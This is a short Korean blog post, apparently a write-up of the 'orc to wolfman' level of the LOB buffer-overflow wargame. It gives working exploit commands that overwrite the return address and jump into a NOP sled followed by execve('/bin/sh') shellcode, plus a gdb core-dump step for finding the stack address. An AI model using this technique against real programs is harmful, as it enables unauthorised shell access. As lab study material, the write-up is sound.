HACKING/[SYSTEM HACKING] LOB
006. orc to wolfman | anxi0
ANX1Z3R0
2019. 2. 17. 17:46
orc to wolfman,
바로 시작하지
내용은 goblin때와 비슷하다
다른 점은 buffer hunter인데,
memset을 이용해 buffer [40]까지 0으로 초기화 하게 된다.
따라서, ret 뒷 영역을 쓰면 된다
<-./wolfman `python -c 'print "A"*44 + "\xbf\xbf\xbf\xbf" + "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
.
그리고 코어 분석을 하는 거지~ <- gdb -c core
음! esp가 0xbfffd3b0이군
그럼 돌아갈 필요없이 그 뒷주소로 ret 해주면 되겠군!<- ./wolfman `python -c 'print "A"*44 + "\xb0\xd3\xff\xbf" + "\x90"*10000 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80"'`
쓱-싹.
1. 정말 할 만한 건가?
2. 배경지식의 중요성
3. 이 끈기 그대로 유지하자